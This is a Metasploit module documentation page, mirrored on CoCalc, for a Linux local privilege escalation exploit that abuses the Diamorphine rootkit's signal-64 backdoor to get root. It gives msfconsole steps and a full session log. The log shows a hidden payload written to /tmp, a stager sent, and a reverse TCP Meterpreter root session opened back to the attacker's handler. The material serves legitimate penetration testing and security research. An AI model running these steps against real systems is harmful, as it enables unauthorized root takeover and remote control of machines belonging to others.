Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/linux/local/diamorphine_rootkit_signal_priv_esc.md
24373 views

Vulnerable Application

Diamorphine is a Linux Kernel Module (LKM) rootkit.

This module uses Diamorphine rootkit's privesc feature using signal 64 to elevate the privileges of arbitrary processes to UID 0 (root).

This module has been tested successfully with Diamorphine from master branch (2019-10-04) on Linux Mint 19 kernel 4.15.0-20-generic (x64).

Verification Steps

  1. Start msfconsole

  2. Get a session

  3. use exploit/linux/local/diamorphine_rootkit_signal_priv_esc

  4. set SESSION [SESSION]

  5. check

  6. run

  7. You should get a new root session

Options

SIGNAL

Diamorphine elevate signal. (default: 64)

Scenarios

Linux Mint 19 (x64)

msf > use exploit/linux/local/diamorphine_rootkit_signal_priv_esc
msf exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > set session 1
session => 1
msf exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > set verbose true
verbose => true
msf exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > check

[*] Executing id ...
uid=0(root) gid=0(root) groups=0(root),1001(test)
[+] The target is vulnerable. Diamorphine is installed and configured to handle signal '64'.
msf exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Executing id ...
uid=0(root) gid=0(root) groups=0(root),1001(test)
[*] Writing '/tmp/.hwL5UoDL6mfZ' (207 bytes) ...
[*] Executing /tmp/.hwL5UoDL6mfZ & echo  ...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (985320 bytes) to 172.16.191.228
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.228:47694) at 2020-02-16 09:28:59 -0500

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 172.16.191.228
OS           : LinuxMint 19 (Linux 4.15.0-20-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >